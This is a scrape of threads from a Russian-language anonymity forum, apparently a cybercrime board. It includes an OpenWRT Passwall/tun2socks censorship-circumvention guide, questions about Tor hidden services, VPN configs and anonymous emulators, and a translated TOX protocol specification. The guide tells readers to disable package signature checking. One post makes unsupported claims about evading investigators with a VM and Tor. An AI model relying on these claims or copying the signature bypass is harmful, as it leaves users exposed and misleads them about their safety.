Разработчик i2pd под никнеймом orignal в отличие от своего коллеги zzz остается скрытной личностью, и, по его словам, не намерен менять такое положение дел. Он открыт для критики и предложений, активно трудится над альтернативным I2P-роутером и смеется над цензурой. В большей степени он является идейным вдохновителем этого материала и примером для разработчиков схожих проектов: Если кому-то нужен хайп личности, или хоть какая-то медийность, ему не место в разработке средств коммуникации, которые являются уравновешивающей силой против деспотии политических режимов. В свою очередь никакой режим не может предоставить «чистое» средство борьбы, не предусмотрев собственную защищенность от него.

![roskomsvoboda.org](/proxy.php?image=https%3A%2F%2Froskomsvoboda.org%2Fuploads%2Fimages%2FTor- ispolzuyut-ne- gangstery.jpg&hash=4691439fffd5954585eb57dc8fdf1dd9&return_error=1)

[ Большинство пользователей Tor не интересуется преступным контентом

](https://roskomsvoboda.org/66960/)

Согласно исследованию Национальной академии наук США, на посещение сайтов в даркнете приходится лишь 6,7% времени работы в данном браузере, причём в несвободных странах число таких пользователей меньше, чем в странах демократических.

roskomsvoboda.org

P.S. Статья не моя, взята с хабр

[ О скрытых сетях и анонимности их разработчиков

](https://habr.com/ru/post/554420/)

Тоталитаризм и диктатура имели место в любой исторический промежуток, о котором знает современная наука. Однако человек склонен к вольномыслию и недовольству всем, что этому препятствует. В наше...

![habr.com](/proxy.php?image=https%3A%2F%2Fassets.habr.com%2Fhabr- web%2Fimg%2Ffavicons%2Ffavicon-16.png&hash=92e2dae146214fab23606c51ef42d36d&return_error=1) habr.com

Андройд эмуляторы, обсуждение

ID: 676533bbb4103b69df371974
Thread ID: 114204
Created: 2024-05-09T16:01:12+0000
Last Post: 2024-05-09T16:40:08+0000
Author: Jolly Roger
Replies: 1 Views: 326

Всем привет! Есть ли какая-то возмонжсть использовать андройд эмулятор по типу Nox более-менее анонимно? На ум приходит только попытаться работать через вложенную виртуализацию, но нормально осуществить к сожалению не получается.

Обход блокировок на OpenWRT с помощью Passwall (v2ray, xray, trojan) и tun2socks

ID: 676533bbb4103b69df371a20
Thread ID: 96298
Created: 2023-08-22T15:24:32+0000
Last Post: 2023-08-25T02:37:17+0000
Author: baykal
Prefix: Статья
Replies: 1 Views: 325

В данном гайде будем собирать OpenWRT на базе стабильной 22.03.5 с дополнительными репозиториями Passwallи [badvpn](https://github.com/helmiau/helmiwrt- packages/tree/main/badvpn)(badvpn-tun2socks). Рекомендуется роутер минимум с 128 МБ RAM (256 предпочтительно) и памятью более 16 МБ, минимальная сборка для mt7621 у меня занимает 17Мб. (Можно использовать внешнюю память, например usb флэшку, об этом в конце статьи)

luci-app-passwall2 это пакет позволяющий настроить в Luci прокси, поддерживающий протоколы v2ray, xray, vless, vmess, hysteria, naiveproxy, shadowsocks, trojan и др.

badvpn-tun2socks это пакет позволяющий направлять трафик в прокси при помощи kmod-tun и использовать традиционные настройки маршрутизации.

Руководство будет включать:

1.1 Установку из репозитория (требует много свободной памяти) или 1.2 Сборку прошивки под ваш роутер с необходимыми пакетами

Настройку Passwall

Настройку tun2socks

1.1 Установка пакетов на текущую прошивку

Источник

Способ самый простой, но требует много памяти, у меня при свободных 20 Мб выдал ошибку по нехватки памяти.

Далее в этом разделе процитирую источник:

в консоли ввести команду:

Code:Copy to clipboard

sed -i 's/option check_signature/# option check_signature/g' /etc/opkg.conf echo "src/gz custom_generic https://raw.githubusercontent.com/lrdrdn/my-opkg-repo/main/generic" >> /etc/opkg/customfeeds.conf echo "src/gz custom_arch https://raw.githubusercontent.com/lrdrdn/my-opkg-repo/main/$(grep "OPENWRT_ARCH" /etc/os-release | awk -F '"' '{print $2}')" >> /etc/opkg/customfeeds.conf

Code:Copy to clipboard

opkg update

Далее установка luci-app-passwall и badvpn

Code:Copy to clipboard

opkg install luci-app-passwall badvpn kmod-tun

При успешном завершении переходим в пункт 2, при неуспешном в пункт 1.2.

1.2 Сборка прошивки

Подробно сборка описана в wiki проекта openwrt.org, я опишу только необходимые шаги для сборки.

Моя среда сборки это виртуальная машина Debian 11 в VirtualBox, рекомендуется не менее 10 Гб свободного места на диске и не менее 4 Гб RAM

Устанавливаем необходимые для сборки пакеты:

Code:Copy to clipboard

sudo apt install binutils bzip2 diffutils flex libc-dev libz-dev perl python3.7 rsync subversion unzip ncurses-dev git-core build-essential libssl-dev libncurses5-dev gawk zlib1g-dev subversion mercurial

Далее скачиваем исходный код OpenWRT версии 22.03.5

Code:Copy to clipboard

git clone https://github.com/openwrt/openwrt.git -b v22.03.5

Добавляем репозитории и обновляем списки:

Code:Copy to clipboard

cd openwrt

Code:Copy to clipboard

echo -e "src-git passwall https://github.com/xiaorouji/openwrt-passwall.git \nsrc-git passwall2 https://github.com/xiaorouji/openwrt-passwall2.git \nsrc-git helmiwrt https://github.com/helmiau/helmiwrt-packages.git" >> feeds.conf.default

Code:Copy to clipboard

./scripts/feeds update -a ./scripts/feeds install -a

Далее OpenWrt проверит отсутствующие пакеты в вашей системе сборки и предложит выбрать архитектуру вашего устройства и модель, а также пакеты для сборки.

Code:Copy to clipboard

make menuconfig

В меню необходимо выбрать ваше устройство и сохранить конфигурацию (кнопка Save).

В сборку необходимо добавить пакеты:

luci

luci-app-passwall2

badvpn

kmod-tun

и удалить пакет dnsmasq , т.к. luci-app-passwall2 имеет зависимость dnsmasq-full , а это конфликтующие зависимости.

Это можно сделать при помощи конфигуратора либо следующей командой:

Code:Copy to clipboard

echo -e "CONFIG_PACKAGE_dnsmasq=n \nCONFIG_PACKAGE_luci=y \nCONFIG_PACKAGE_luci-app-passwall2=y \nCONFIG_PACKAGE_luci-app-passwall2_INCLUDE_Shadowsocks_Rust_Client=y \nCONFIG_PACKAGE_kmod-tun=y \nCONFIG_PACKAGE_badvpn=y" >> .config

Так же для последующего использования BGP для получения маршрутов от antifilter.download, antifilter.network добавим пакеты bird2 и bird2c

Code:Copy to clipboard

echo -e "CONFIG_PACKAGE_bird2=y \nCONFIG_PACKAGE_bird2c=y" >> .config

после чего повторно запустить проверку:

Code:Copy to clipboard

make menuconfig

Убедиться что устройство выбрано правильно и настройки не потеряны и сохранить конфигурацию повторно (Save).

На этом этапе сборка не включает дополнительных пакетов как OpenVPN, Wireguard, UPnP, QoS. Их добавление увеличит размер образа. Для их добавление введите команду:

Code:Copy to clipboard

echo -e "CONFIG_PACKAGE_luci-app-openvpn=y \nCONFIG_PACKAGE_luci-app-wireguard=y \nCONFIG_PACKAGE_openvpn-openssl=y \nCONFIG_PACKAGE_luci-app-qos=y \nCONFIG_PACKAGE_luci-app-upnp=y " >> .config

После чего повторно запустите проверку и сохраните конфигурацию:

Code:Copy to clipboard

make menuconfig

После чего запускаем сборку образа:

Code:Copy to clipboard

make -j9 V=s

Команда запускает сборку на 8 потоках (ядрах) (8+1) с трассировкой каталогов (путей).

Ждём окончания сборки (около 1 часа), после чего скачиваем файлы из папки ~/openwrt/bin/targets/$платформа /$архитектура /

Для обновления существующей прошивки OpenWRT понадобится файл оканчивающийся на *-sysupgrade.bin

После чего заходим в интерфейс вашего роутера, переходим в Система - Восстановление/обновление

И загружаем собранный образ, галку сохранить настройки убрать (можно настройки сохранить, но возможно проблемы, не рекомендую).

В случае вашего роутера могут быть отличия по способу прошивки, рекомендую посетить тему по вашему устройству на сайте OpenWRT [OpenWrt Wiki] Table of Hardware дабы случайно не получить кирпич вместо роутера.

Ждём окончания обновления роутера.

Далее потребуется первичная настройка роутера, необходимо обеспечить подключение к интернету согласно настройкам вашего провайдера.

Разобравшись с интернетом, переходим к пункту 2.

2. Настройка Passwall

Переходим в пункт Службы (Services) - PassWall 2 (Passwall)

Далее Node List

Здесь добавляем свою конфигурацию в виде ссылки через Add the node via the link

Passwall распознаёт ссылки почти всех форматов

Ссылки из Outline VPN так же работают (shadowsocks), его настройку разбирал тут.

При добавлении нескольких нодов можно настроить резервирование во вкладке Auto Switch

How often to test определяет периодичность проверки доступности прокси в минутах.

В List of backup nodes вносятся резервные прокси в порядке очереди перебора.

Галка Restore Switch определяет будет ли происходить обратное переключение при восстановлении доступа к главному прокси.

Переходим в Basic Settings

Здесь выбираем главный нод (прокси) и активируем подключение галкой Main Switch.

Так же активируем Localhost Proxy и при необходимости меняем Node Socks порт для входящих соединений (он понадобится для настройки tun2socks).

Проверяем соединение нажатием на кнопки: Baidu Connection, Google и Github

Далее переходим к настройке tun2socks.

3.Настройка tun2socks

Для проверки работы туннеля введём команду:

Code:Copy to clipboard

badvpn-tun2socks --tundev tun0 --netif-ipaddr 10.0.0.2 --netif-netmask 255.255.255.0 --socks-server-addr 127.0.0.1:1070

Запустится туннель с логированием:

Где tun0 наименование туннеля (если у вас запущен OpenVPN или другой туннель использующий kmod-tun, измените значение на tun1, tun2 и т.д.).

netif-ipaddr - адрес интерфейса (не должен совпадать с диапазоном адресов локальной сети).

netif-netmask - сетевая маска /24.

socks-server-addr - адрес socks указывающий на Passwall на порту 1070 (если вы меняли порт в п.2 укажите свой).

Для проверки работоспособности можно временно добавить маршрут к сайту 2ip.ru (не закрывая badvpn-tun2socks, в параллельной вкладке).

Подробная документация на badvpn-tun2socks есть на сайте проекта

Code:Copy to clipboard

ip route add 195.201.201.0/24 dev tun0

Обращаемся к сайту и смотрим логи:

Code:Copy to clipboard

wget -qO- http://ipecho.net/plain | xargs echo

Если всё работает, команда вернёт IP вашего прокси.

Можно закрывать badvpn-tun2socks и удалить маршрут:

Code:Copy to clipboard

ip route del 195.201.201.0/24

Теперь настроим службу, чтобы интерфейс начинал работать при загрузке роутера.

Здесь хочу выразить огромную благодарность пользователю itdog за информацию по настройке службы tun2socks (и за обзор темы впринципе).

В файл /etc/init.d/tun2socks вносим следующее содержание, например при помощи vi :

Code:Copy to clipboard

#!/bin/sh /etc/rc.common USE_PROCD=1 # starts after network starts START=40 # stops before networking stops STOP=89 PROG=/usr/bin/badvpn-tun2socks IF="tun2" HOST="127.0.0.1" PORT="1070" IPADDR="10.0.0.2" NETMASK="255.255.255.0" start_service() { procd_open_instance procd_set_param command "$PROG" --tundev "$IF" --netif-ipaddr "$IPADDR" --netif-netmask "$NETMASK" --socks-server-addr "$HOST":"$PORT" procd_set_param stdout 1 procd_set_param stderr 1 procd_set_param respawn ${respawn_threshold:-3600} ${respawn_timeout:-5} ${respawn_retry:-5} procd_close_instance }

Где IF - интерфейс, в данном примере tun2 (вместо tun0) чтобы избежать конфликтов с существующими туннелями.

Port - порт Socks Passwall из п.2.

Делаем файлы исполняемым:

Code:Copy to clipboard

chmod +x /etc/init.d/tun2socks

Делаем автозапуск:

Code:Copy to clipboard

ln -s /etc/init.d/tun2socks /etc/rc.d/S90tun2socks

Запускаем:

Code:Copy to clipboard

/etc/init.d/tun2socks start

Проверяем что интерфейс появился:

Code:Copy to clipboard

ip a | grep 'tun2'

Если заработал, выдаст подобный результат:

Code:Copy to clipboard

tun2: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500

Если нет, ответ будет пустым.

Далее необходимо настроить маршруты к которым роутер будет обращаться через прокси.

Здесь я дам ссылки на известные мне способы настройки таких маршрутов:
Точечный обход блокировок на роутере OpenWrt c помощью BGP / Хабр (habr.com) С помощью BGP (bird2).
Точечный обход блокировок PKH на роутере с OpenWrt с помощью WireGuard и DNSCrypt / Хабр (habr.com) (путём скачивания списков и настройкой маршрутов в iptables, nftables).

Для роутеров с малым количеством постоянной памяти (ROM) и портом USB можно воспользоваться инструкцией [[OpenWrt Wiki] Корневая файловая система на внешнем устройстве (extroot)](https://openwrt.org/ru/docs/guide- user/additional-software/extroot_configuration) , после чего попробовать установку из пункта 1.1.

Автор @Andrevich
Источник habr.com

Кака прокинуть на Айфоне носок

ID: 676533bbb4103b69df371b6e
Thread ID: 60305
Created: 2021-12-21T15:41:03+0000
Last Post: 2021-12-25T11:15:01+0000
Author: avia
Replies: 6 Views: 324

Как на айфоне прокинуть носок подскажите плиз
Или через вай фай роутер

Проверьте своего провайдера!

ID: 676533bbb4103b69df3719e6
Thread ID: 102490
Created: 2023-11-18T13:43:19+0000
Last Post: 2023-11-18T15:43:18+0000
Author: michail
Replies: 2 Views: 320

Всё началось с этой темы

https://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion/threads/102384/

Попросил друга трассировать маршрут у себя. И сейчас пишу результаты. Потом опишу выводы. И то, что возможно что вы сильно рисковали в своей безопасности.
При трассировке оказалось, что разные провайдеры применяют различные "манеры" работы.
Одни провайдеры создают в городах своеобразные разветвлённые сети, а другие просто "палят" напрямик. В нашем городе у одного провайдера вот как распределение идёт. На один или несколько домов - сервер, далее второй узел уже районный и третий общий узел, который отдаёт на Москву!
Другой провайдер просто "бьёт" сразу на центральный в городе. Наверно через какой то радио - шлюз. При этом видимо есть свои плюсы. И с центрального так же на Москву.
Скорее всего шкафы РОСКОМНАДЗОР стоят в Москве и отдельно для каждого провайдера. Ну так показало! Тут без комментариев.
Но самое важное вот что. Если использовать виртуальную машину, то вот какие есть опасности или наоборот преимущества.
Некоторые люди на форуме писали, что мол можно пробить человека с точностью до ПК.
Смею это опровергнуть и трассировка это доказала.
Виртуальную машину можно только застукать за своим районом, сколько обслуживает её узел. Отсюда следует, что на одном провайдере грубо нужно майорам выбирать из 100 - 600 человек, а на другом провайдере маорам нужно искать одного из порядка миллиона (плюс минус смотря какой город). Это как искать иголку в стоге сена.
Вот вам доказательство для не верующих. Возможно да, тут присутствуют люди, которые администрировали на оборудовании провайдеров. Но при умном подходе хакеров вам не удастся за дёшево найти нужный ПК, с которого работает нужная вам виртуалка. И скорее долго ещё этот вопрос не будет решён.
Это ответ тем, которые утверждают, что их ВПН и какие то носки гораздо лучше сильнее и анонимнее чем виртуальная машина. Да нет же! Забудьте такие свои вымыслы!
Если выбрать правильного провайдера, который не поделил город на микро куски, то при использовании ВМ и например ТОР вы будете прилично так защищены.
Я уже писал, что если у меня был вирус, перестал ТОР работать, то мне бы было очень плохо. А так защищает ВМ и деанонимизации не произошло. Это второй камень в огород не верующих.
Не нужно думать, что с железной ОС вы всё сможете и вечно анонимно работать. Вы очень сильно рискуете и быстро спалитесь!
Причём этот пал может быть как из вашей же ОС, так и из вне.

повторное анонсирование hidden service после отвала коннекта

ID: 676533bbb4103b69df3719db
Thread ID: 103020
Created: 2023-11-26T14:11:58+0000
Last Post: 2023-11-26T18:28:48+0000
Author: gliderexpert
Replies: 3 Views: 320

Всем привет. Имеется такая проблема.
Сервак, на нем работает tor hidden service . Допустим, на серваке падает коннект к сети. Захожу на длинный_адрес_онион_v3.onion , через тор браузер, вижу что "onion сайт не найден" Восстанавливаю коннект к интернету на сервере. Сам сервак и тор естественно не перезапускаю. Выполняю команду "torify curl -s xss.is" - все работает, т.е. коннект и тор на серваке вроде как поднялся.
Но, при попытке зайти на длинный_адрес_онион_v3.onion - висит все еще "onion сайт не найден" , и так оно может висеть часами.
Далее - запускаю на серваке "service tor restart" - и о чудо, сайт становится доступным. Иногда, очень редко - приходится сначала почистить "var/lib/tor/cached-* " и потом так же ресетнуть tor.

Вопросы уважаемой аудитории.
- что это за хрень и как дебажить. Не понимаю физику процесса, не может же такого быть в теории - что тор работает, а сервис снаружи не виден
- как определять глюк со стороны сервера? Кроме принудительного ресета tor демона при пропадании коннекта.

Вид логов у провайдера

ID: 676533bbb4103b69df3718e8
Thread ID: 129146
Created: 2024-12-17T13:19:14+0000
Last Post: 2024-12-17T16:01:50+0000
Author: NWA_USE
Replies: 7 Views: 319

Привет всем! Меня интересует, какой именно вид логов ведет провайдер. Именно вид. К примеру когда я захожу на википедию. Спасибо!

Помогите с конфигом ВПН

ID: 676533bbb4103b69df371b7b
Thread ID: 59236
Created: 2021-11-24T09:07:04+0000
Last Post: 2021-11-25T11:53:49+0000
Author: 801
Replies: 7 Views: 318

Конфиг с корпа, работники им пользуются под win через OpenVPN и он должен работать. Загружаю в клиент OpenVPN, коннект есть, но трафик идет мимо и ИП не меняется. Так же пробовал под линукс, такая же проблема. Другие конфиги работают, явно дело в конфиге.

Code:Copy to clipboard

client # Dev Name can be changed to tun<x> for Linux only dev tun # Comment out and change the TAP device name for Windows client #dev-node "xxxx.com_xxxxx" proto tcp #remote xxxxxx-2c.xxxx.com remote xxxxxxx-1a.xxxx.com pull resolv-retry infinite nobind tls-client key-direction 0 <tls-auth> -----BEGIN OpenVPN Static key V1----- xxx -----END OpenVPN Static key V1----- </tls-auth> remote-cert-tls server auth-nocache cipher AES-256-CBC keepalive 5 30 persist-key persist-tun socket-flags TCP_NODELAY verb 2 status xxxx-xxxxxx.status <ca> -----BEGIN CERTIFICATE----- xxx -----END CERTIFICATE----- </ca> <cert> -----BEGIN CERTIFICATE----- xxx -----END CERTIFICATE----- </cert> <key> -----BEGIN RSA PRIVATE KEY----- xxx -----END RSA PRIVATE KEY----- </key>

Outline VPN, сбрасывает соединение

ID: 676533bbb4103b69df371973
Thread ID: 114297
Created: 2024-05-11T13:20:57+0000
Last Post: 2024-05-11T13:45:41+0000
Author: AlwaysP
Replies: 2 Views: 316

При работе с Outline, постоянно сбрасывает соединение с ПК, с телефона такого нет, подскажите, в чем проблема?

Безопастность при работате с архивами

ID: 676533bbb4103b69df371a25
Thread ID: 95708
Created: 2023-08-15T10:12:30+0000
Last Post: 2023-08-19T07:49:27+0000
Author: hashrate
Replies: 6 Views: 316

Если приходиться работать с большим количеством архивов из не проверенных источников, реально ли себя как-то обезопасить от вирусов? Файлы внутри архивов проверяются софтом, так что это не особо проблема. Больше волнует сама распаковка архива.
Речь про Windows, использовать Linux не предлагайте тк работу нужно выполнить именно на винде.

Как делать зашифрованные бэкапы на сервер?

ID: 676533bbb4103b69df371a9a
Thread ID: 74084
Created: 2022-10-08T11:54:00+0000
Last Post: 2022-11-07T04:10:03+0000
Author: chillco
Replies: 3 Views: 314

Здравствуйте.
Нужно сохранить бэкапы на сервер, да так, что бы сервер получал только зашифрованные данные, т.е. шифрование на локальном устройстве перед загрузкой данных на сервер и расшифрование после скачивания используя ключ шифрования сохранённый локально.
Конечно, удобство имеет значение, а значит изменение одного байта в данных не должно требовать загрузки всех данных заново.

Было бы хорошо если бы сохранялась файловая структура, но тоже была зашифрованной для сервера. Т.е. сервер не знал бы о данных ничего, кроме их размера.
Такой себе FTP, но полностью зашифрованный.

Есть ли готовые решения?
Что можете посоветовать? Спасибо!

Перевод текстовой специикации протокола TOX ч2

ID: 676533bbb4103b69df371a75
Thread ID: 85533
Created: 2023-04-09T08:57:31+0000
Last Post: 2023-04-09T08:57:31+0000
Author: вавилонец
Prefix: Статья
Replies: 0 Views: 314

7 TCP-сервер

Цель TCP-сервера - действовать как TCP-реле между клиентами, которые не могут подключиться друг к другу напрямую или по каким-то причинам ограничены в использовании протокола TCP для подключения друг к другу. TCP_server обычно запускается только на реальных серверных машинах, но любой клиент Tox может разместить у себя такой сервер, поскольку api для его запуска раскрывается через tox.h api.
Для подключения к размещенному TCP-серверу toxcore использует модуль TCP- клиента.
TCP-соединения между TCP-клиентом и сервером шифруются, чтобы посторонний человек не мог узнать информацию о том, кто к кому подключается, просто посмотрев на чье-то соединение с TCP-сервером. Это полезно, когда кто-то подключается через что-то вроде Tor, например. Это также предотвращает внедрение данных в поток третьей стороной и позволяет нам считать, что любые полученные данные не были подделаны и являются именно теми, которые были отправлены клиентом.
TCP-сервер, по сути, действует как ретранслятор между двумя одноранговыми сетями. Когда TCP-клиент подключается к серверу, он сообщает серверу, с какими клиентами он хочет, чтобы сервер его соединил. Сервер позволит двум клиентам соединиться друг с другом только в том случае, если они оба указали серверу, что хотят соединиться друг с другом. Это делается для того, чтобы недруги не могли проверить, подключен ли кто-то к TCP-серверу. TCP-сервер поддерживает отправку пакетов вслепую через него клиентам с клиентом с открытым ключом X (OOB-пакеты), однако TCP-сервер не дает никакой обратной связи относительно того, прибыл пакет или нет, и поэтому он полезен только для отправки данных друзьям, которые могут не знать, что мы подключены к текущему TCP-серверу, в то время как мы знаем, что они подключены.
Это происходит, когда один пир обнаруживает TCP реле и открытый ключ DHT другого пира до того, как другой пир обнаруживает свой открытый ключ DHT. В этом случае OOB-пакеты будут использоваться до тех пор, пока другой пир не узнает, что пир подключен к реле и не установит соединение через него.
Для того чтобы toxcore работал на TCP, только TCP-сервер поддерживает ретрансляцию луковых пакетов от TCP-клиентов и отправку любых ответов от них TCP-клиентам.

7.1 TCP-соединение

Когда клиент впервые подключается к TCP-серверу, он открывает TCP-соединение с IP-адресом и портом, который прослушивает TCP-сервер. После установления соединения отправляется пакет Handshake Request. Затем сервер отвечает своим Handshake Response, и устанавливается безопасное соединение. После этого соединение считается неподтвержденным, и клиент должен отправить на сервер зашифрованные данные, прежде чем сервер сможет отметить соединение как подтвержденное.
Это делается для того, чтобы предотвратить тип атаки, при которой клиент отправляет пакет рукопожатия, а затем сразу же прерывает соединение. Чтобы предотвратить это, сервер должен подождать несколько секунд, пока клиент получит пакет handshake, прежде чем подтвердить соединение. После этого оба могут общаться друг с другом, используя зашифрованное соединение.

7.2 TCP Handshake

Логика, лежащая в основе формата рукопожатия, заключается в том, что нам:

необходимо доказать серверу, что мы владеем закрытым ключом, связанным с открытым ключом, которым мы себя объявляем.
установить безопасное соединение, которое обладает совершенной прямой секретностью
предотвратить любые атаки воспроизведения, самозванства или другие атаки.

Как достигается каждый из этих пунктов:

Если клиент не владеет закрытым ключом, связанным с открытым ключом, он не сможет создать пакет рукопожатия.
Временные сеансовые ключи, созданные клиентом и сервером в зашифрованной части Handshake Packets, используются для шифрования/дешифрования пакетов во время сеанса.

Предотвращаются следующие атаки:

Злоумышленник изменяет любой байт пакета Handshake: Расшифровка не удается, атаки невозможны.
Атакующий перехватывает пакет рукопожатия у клиента и позже воспроизводит его на сервере: Атакующий никогда не получит от сервера подтверждения соединения (нет эффекта).
Злоумышленник перехватывает ответ сервера и отправляет его клиенту при следующей попытке подключения к серверу: Клиент никогда не подтвердит соединение. (См.: TCP_client)
Злоумышленник пытается выдать себя за сервер: Он не сможет расшифровать Handshake и не сможет ответить.
Атакующий пытается выдать себя за клиента: Сервер не сможет расшифровать Handshake.

7.2.1 Диаграмма Handshake

7.2.1.1 Диаграмма Handshake - клиент

PK + PublicKey
SK + SecretKey
PcK + PrecomputedKey (Combined Key)

Диграмму переписывать я не стал, а сделал в виде фотографий в которых нижняя дополняет верхнюю, думаю будет понятно

View attachment 54373
View attachment 54374

7.2.1.2 Диаграмма рукопожатия — сервер

PK + PublicKey
SK + SecretKey
PcK + PrecomputedKey (Combined Key)

View attachment 54375
View attachment 54376

7.2.2 Запрос рукопожатия

Первые 32 байта в запросе - это открытый ключ DHT, с помощью которого клиент TCP сообщает о себе серверу. Следующие 24 байта - это nonce, который TCP- клиент использует вместе с секретным ключом, связанным с открытым ключом в первых 32 байтах пакета, для шифрования остальной части пакета.
Зашифрованная полезная нагрузка содержит временный открытый ключ, который будет использоваться для шифрования во время соединения и будет отброшен после него. Он также содержит Client Base Nonce, который будет использоваться позже для шифрования пакетов, отправляемых на TCP-сервер.
Для установления безопасного соединения с TCP-сервером клиент отправляет серверу следующие 128 байт Handshake Packet:

Length| Contents
---|---
32| DHT Public Key of client
24| Nonce for the encrypted payload
72| Payload (plus MAC)

7.2.2.1 Полезная нагрузка пакета запроса рукопожатия

Полезная нагрузка шифруется с помощью закрытого ключа DHT клиента и открытого ключа сервера, а также с помощью nonce и содержит:

Length| Contents
---|---
32| Temporary Public Key
24| Client Base Nonce

Client Base Nonce - это случайный nonce, который TCP-клиент хочет, чтобы TCP- сервер использовал для расшифровки пакетов, отправляемых TCP-серверу.

7.2.3 Ответ на рукопожатие

Если сервер успешно расшифровывает зашифрованную полезную нагрузку из пакета Handshake Packet, он отвечает следующим Handshake Response длиной 96 байт:

Length| Contents
---|---
24| Nonce for the encrypted payload
72| Payload (plus MAC)

Клиент уже знает долгосрочный открытый ключ сервера, поэтому он опущен в ответе Handshake Response, таким образом, в незашифрованной части присутствует только nonce. Зашифрованная полезная нагрузка ответа содержит те же элементы, что и зашифрованная полезная нагрузка Handshake Request: временный открытый ключ, привязанный к данному соединению, и Server Base Nonce, который будет использоваться позже при расшифровке пакетов, полученных от TCP-сервера, оба уникальны для данного соединения.

7.2.3.1 Полезная нагрузка ответа на квитирование

Полезная нагрузка шифруется с помощью закрытого ключа сервера и открытого ключа DHT клиента, а также с помощью nonce и содержит:

Length| Contents
---|---
32| Public key
24| Server Base Nonce

Server Base Nonce - это случайный nonce, который TCP-сервер хочет, чтобы TCP- клиент использовал для расшифровки пакетов, отправляемых TCP-клиенту.

7.3 После рукопожатия

Теперь клиент будет знать временный открытый ключ сервера и Server Base Nonce для соединения, а сервер будет знать Client Base Nonce и временный открытый ключ для соединения.
Затем клиент отправит зашифрованный пакет на сервер. Первый пакет должен быть любым действительным зашифрованным пакетом данных, на который сервер должен ответить, например, если клиент посылает Ping Request (0x04), сервер должен ответить Ping Response.
Первый пакет, отправленный клиентом, и ответ сервера используются для проверки того, может ли клиент правильно зашифровать отправленный пакет и правильно расшифровать полученный ответ.
Это важно и для сервера, поскольку правильно зашифрованный клиентом запрос означает, что он действительно пришел от клиента, а не от ответных пакетов злоумышленника.
Сервер должен предотвращать ресурсозатратные атаки путем тайминга клиентов, если они не посылают никаких зашифрованных пакетов на сервер, чтобы доказать серверу, что соединение было установлено правильно.
В Toxcore нет таймаута для клиентов, вместо этого он хранит подключающихся клиентов в больших круговых списках и отключает их, если их запись в списке заменяется более новым соединением. Это делается для того, чтобы предотвратить негативное влияние атак TCP flood на подключенные узлы. Однако есть гораздо лучшие способы сделать это, и единственная причина, по которой toxcore делает это таким образом, заключается в том, что написать его было очень просто. Когда соединения подтверждаются, они перемещаются в другое место.
Когда сервер подтверждает соединение, он должен посмотреть в списке подключенных аналогов, не подключен ли он уже к клиенту с таким же объявленным открытым ключом. Если это так, сервер должен уничтожить предыдущее соединение, так как это означает, что клиент ранее вышел по таймеру и снова подключается. Из-за конструкции Toxcore очень маловероятно, чтобы два разных пира имели одинаковый открытый ключ.

7.4 Зашифрованный пакет данных

Зашифрованные пакеты данных для посторонних выглядят следующим образом:

Length| Contents
---|---
2| uint16_t length of data
variable| encrypted data

В потоке TCP они будут выглядеть следующим образом: [[length][data]][[length][data]][[length][data]]....

7.4.1 Ключи зашифрованных пакетов данных

И клиент, и сервер используют временные открытый и секретный ключи соединения, которые генерируются каждый для своего соединения, а затем часть открытого ключа отправляется другому в процессе рукопожатия. Затем они используются, как показано на схеме, для генерации комбинированного ключа, который одинаков для обеих сторон:

Client: Server:
generate_shared_key( generate_shared_key(
[temp connection Public Key of server], [temp connection Public Key of client],
[temp connection Secret Key of client]) [temp connection Secret Key of server])
= =
[Combined Key] [Combined key]

Сгенерированный комбинированный ключ одинаков для обеих сторон и используется для шифрования и дешифрования зашифрованных пакетов данных.

7.4.2 Зашифрованные nonces пакетов данных

7.4.2.1 Зашифрованные пакеты данных от сервера

Каждый зашифрованный пакет данных, отправленный клиенту, будет зашифрован с помощью комбинированного ключа и с помощью Server Base Nonce, увеличенного на количество отправленных пакетов: Server Base Nonce + количество отправленных пакетов.Количество отправленных пакетов начинается с 0 для первого пакета, в котором используется Server Base Nonce. Второй пакет будет использовать Server Base Nonce + 1, и так далее.

7.4.2.2 Зашифрованные пакеты данных от клиента

Каждый пакет, отправленный на сервер от клиента, будет зашифрован с помощью комбинированного ключа и Client Base Nonce, увеличенного на количество отправленных пакетов: Client Base Nonce + количество отправленных пакетов. Количество отправленных пакетов начинается с 0 для первого пакета, в котором используется Client Base Nonce. Второй пакет будет использовать Client Base Nonce + 1, и так далее.

7.4.3 Размер пакета зашифрованных данных

Зашифрованные пакеты данных имеют жесткий максимальный размер 2 + 2048 байт в реализации сервера toxcore TCP.
2 байта информируют о количестве байт, которые имеет следующий пакет данных.

2048 байт достаточно для того, чтобы убедиться, что все пакеты toxcore могут пройти через него, и оставляет некоторое дополнительное пространство на случай, если протокол будет изменен в будущем.
В текущем toxcore самые большие отправляемые зашифрованные пакеты данных будут иметь размер 2 + 1417, что в сумме составляет 1419.

7.4.4 Обоснование зашифрованного пакета данных

Логика, лежащая в основе формата зашифрованных пакетов, такова:

TCP - потоковый протокол, нам нужны пакеты.
Любые атаки должны быть предотвращены.

Как достигается каждый из этих пунктов:

2 байта перед каждым пакетом зашифрованных данных обозначают длину. Мы предполагаем, что функционирующий TCP будет передавать байты по порядку. Если TCP работает некорректно, это, скорее всего, означает, что он подвергается атаке, о чем см. следующий пункт.

Следующие атаки предотвращаются:

Изменение длины байта приведет к тайм-ауту соединения и/или сбою расшифровки.
Изменение любых зашифрованных байтов приведет к сбою расшифровки.
Инъекция любых байтов приведет к сбою расшифровки.
Попытка переупорядочить пакеты приведет к сбою расшифровки из-за упорядоченного nonce.
Удаление любых пакетов из потока приведет к неудаче расшифровки из-за заказанного nonce.

7.5 Типы зашифрованной полезной нагрузки

Ниже представлены различные типы данных, которые могут быть отправлены в зашифрованных пакетах данных.

7.5.1 Запрос маршрутизации (0x00)

Length| Contents
---|---
1| uint8_t (0x00)
32| Public key

7.5.2 Ответ на запрос маршрутизации (0x01)

Length| Contents
---|---
1| uint8_t (0x01)
1| uint8_t rpid
32| Public key

rpid недействителен connection_id (0), если отказано, connection_id, если принято if accepted.

7.5.3 Connect notification (0x02)

Length| Contents
---|---
1| uint8_t (0x02)
1| uint8_t connection_id of connection that got connected

7.5.4 Disconnect notification (0x03)

Длина | Содержание
---|---
1| uint8_t(0x03)
1| uint8_t connection_idс оединения, которое было отключено

7.5.5 Запрос проверки связи (0x04)

Длина | Содержание
---|---
1| uint8_t(0x04)
8| uint64_t ping_id(0 недействителен)

7.5.6 Ответ на эхо-запрос (понг) (0x05)

Длина | Содержание
---|---
1| uint8_t(0x05)
8| uint64_t ping_id(0 недействителен)

